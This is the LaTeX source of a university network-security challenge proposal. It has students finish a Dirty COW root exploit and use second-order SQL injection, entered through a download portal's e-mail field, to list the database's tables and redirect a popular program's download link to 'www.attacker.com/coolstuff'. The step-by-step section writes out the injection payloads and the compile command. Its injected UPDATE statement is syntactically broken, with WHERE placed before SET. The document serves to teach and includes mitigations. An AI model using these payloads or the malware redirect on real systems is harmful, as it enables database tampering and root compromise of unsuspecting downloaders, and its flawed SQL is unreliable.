\documentclass[a4paper,11pt]{article}
\usepackage[T1]{fontenc}
\usepackage{ae, aecompl}
\usepackage{a4wide}
\usepackage{hyperref}
\usepackage{minted}
% ...
\title{Network Security Challenge Proposal:\\
Can a cow help to rule the web?}
\author{Pragnya Alatur, Sivaranjini Chithambaram,\\Christian Fehlmann, Zeno Koller, Samuel Steffen}


\begin{document}
\maketitle
\begin{abstract}
An online software download portal offers free downloads of popular software. Users can also upload their own software. The portal already offers several well-known applications such as \texttt{Photo Store}, the photo editing software by Adorable Inc., which has thousands of downloads per day. The database administrators have implemented all queries that contain user input in the \texttt{where} clause with prepared statements. However, internal queries that only use data from already stored content are directly executed. In particular, a join statement used to list ''other software from this author`` includes the software author's e-mail address. Using indirect SQL injection, an attacker can replace the download link of the popular \texttt{Photo Store} software with a link to a malware which makes use of the \textit{Dirty COW} vulnerability \cite{cow_vulnerability}.

Dirty COW (copy-on-write) is a vulnerability which has existed in the Linux kernel for many years. The attack exploits a race condition, targeting the kernel's copy-on-write mechanism. Using this exploit, a user can get root access to a system.
\end{abstract}

\section{Requirements}
\begin{itemize}
\item Webserver hosting the software download portal with latest \texttt{Apache2}, \texttt{PHP} and \texttt{mySQL} installed (will be delivered as a ready-to-use Debian VM).
\item Webserver (under attacker's control) where the attacker can upload the created dirty COW malware. 
\item In order to perform the SQL injection, the client requires an internet connection (or a local network shared with the webserver VM). The student/attacker can perform the injection on his own operating system.
\item The victim's machine should run on Linux with a kernel version earlier than
\begin{itemize}
\item 4.8.0-26.28 for Ubuntu 16.10
\item 4.4.0-45.66 for Ubuntu 16.04 LTS
\item 3.13.0-100.147 for Ubuntu 14.04 LTS
\item 3.16.36-1+deb8u2 for Debian 8
\item 3.2.82-1 for Debian 7
\end{itemize}
These versions are vulnerable to the Dirty COW exploit. A victim VM with a suitable Linux kernel verion will be provided.
\item We will provide a \texttt{C} file that contains some TODO's which after implementing the missing parts will compile to the malware on the attacker VM.
\end{itemize}

\section{Learning goal}
The student should learn the importance of SQL injection threats and how important it is to use prepared statements no matter how deep and hidden the statement is in the program. He should also note that input validation is a good approach to restrict the possible attack space. Additionally, it is crucial to patch a system regularly to avoid being vulnerable to bugs in the system that are well known and easily exploited.

\section{Mission}
Finish the implementation of the malware which exploits the Dirty Cow vulnerability \cite{cow_vulnerability}. Then, attack a program download portal by exploiting an SQL injection vulnerability. First, find out what tables there are on the data base. Second, execute an \texttt{UPDATE} statement on the table that stores the download link of the popular \texttt{Photo Store} software such that it points to the attacker's server containing the Dirty COW malware. As a result, all users download the malware instead of the original software. Your goal is to get root access on these users' machines.

\section{Mitigation}
\begin{itemize}
\item Website Host
\begin{itemize}
\item Make sure you only use prepared (precompiled) statements for all SQL queries which potentially include any data that could, also indirectly, originate from the user or an attacker.
\item Use explicit input validation if there is a pattern to check for. In particular for our challenge, the e-mail address entry field (see address format in RFC5322).
\end{itemize}
\item Victim Client
\begin{itemize}
\item Install the latest patch for your Linux Kernel which contains a fix for the Dirty COW bug. You can find a list of patched Kernel versions at \cite{cow_patched_kernel}.
\end{itemize}
\end{itemize}

\section{Type of challenge} 
This is an \emph{online} challenge, since we are exploiting the vulnerability of a web application. The malware to get root access is executed on the victim's host by enforcing a race condition. Thus the second part is an \emph{offline} challenge.

\section{Category}
\begin{itemize}
\item Database
\item Malware
\item Linux
\end{itemize}

\section{Hints}
\begin{itemize}
\item Inspect the program detail page url of the  \texttt{Photo Store} program to find out its id.
\item The database administrators took great care and implemented all input SQL queries (i.e. queries, which insert/update values in the database) as prepared statements. Thus, direct SQL injection is not possible. Try to abuse other existing SQL queries in the system to, indirectly, perform the attack when the program detail page is loaded.
\item The name of the table which contains the download links is: \texttt{links2programs}
\end{itemize}
\section{Step-by-step instructions}
\begin{enumerate}
\item Finish the implementation of the provided file \texttt{cowroot.c} which exploits the Dirty COW vulnerability and compile it using \mint{c}|gcc cowroot.c -o coolstuff -pthread|
\item Upload the COW malware \texttt{coolstuff} on your own server.
\item Retrieve the ID of the popular \texttt{Photo Store} software from its detail page on the download portal (the URL is \texttt{home/details.php?id$=$XX}).
\item Either guess the table \texttt{links2programs} and directly go to step 7, or guess the table \texttt{Software}.

In the latter case, fill out the form for uploading your own software for the first time, inserting some dummy data for a software \texttt{A} and setting \texttt{attacker@attack.com} as the e-mail address.

After having submitted the form, fill out the form for some software \texttt{B}, but this time enter the following data into the e-mail field (The column data types can be guessed based on the table displayed in the web frontend. The columns are title, description, author e-mail, rating): 
\mint{mysql}|'; INSERT INTO Software SELECT table_name, "", "attacker@attack.com", 0| 
\mint{mysql}|FROM information_schema.tables WHERE table_schema=DATABASE(); -- | 
to find out after the next step which other tables exist on the database. For the time being, nothing happens. As the query adding new software to the database is precompiled, the server simply inserts the string above into the \texttt{mail} field of the authors table.

\item Now navigate to the newly added detailed page of software \texttt{B}. Here, upon loading this page, the query to find other software from this author is executed (\texttt{mail} is inserted via a local variable that was retrieved in a previous \texttt{SELECT} query for the program details):
\mint{mysql}|SELECT * FROM Software WHERE Author = mail AND NOT ID = id;|
Resulting in the following effective query:
\mint{mysql}|SELECT * FROM Software WHERE Author = '';| 
\mint{mysql}|INSERT INTO Software SELECT table_name, "", "attacker@attack.com", 0| \mint{mysql}|FROM information_schema.tables WHERE table_schema=DATABASE();| 
\mint{mysql}|-- ' AND NOT ID = id| 
Now, every table name in the database is inserted into the \texttt{Software} table with the author set to the attacker's e-mail. On the detail page of the attacker's software \texttt{A}, you can see the list of all database tables under the ''also from this author`` list.
\item On the software download portal, fill out the form for uploading another dummy software \texttt{C} a third time. Theoretically, you could upload the malware right away, however it would not achieve a big number of downloads, since it is not popular. In the e-mail field, enter (assuming 22 is the ID of the \texttt{Photo Store} software): 
\mint{mysql}|'; UPDATE links2programs WHERE ID=22 | 
\mint{mysql}|SET Link='www.attacker.com/coolstuff'; -- | 
Again, the server simply inserts the string above into the \texttt{mail} field of the authors table.
\item Now, navigate to the newly added detailed page of software \texttt{C}, where upon loading this page the query to find other software from this author is executed: 
\mint{mysql}|SELECT * FROM Software WHERE Author = '';| 
\mint{mysql}|UPDATE links2programs WHERE ID=22 SET Link='www.attacker.com/coolstuff';| \mint{mysql}|-- ' AND NOT ID = id|
From now on, all clients which download the software \texttt{Photo Store} will be redirected to the attacker's server where they download the COW malware.

\item Using the victim VM, navigate to the software download portal and click the download link for the \texttt{Photo Store} app. Run the downloaded program and see your COW malware in action.
\end{enumerate}

\bibliographystyle{plain}
\bibliography{bibliography}

\end{document}
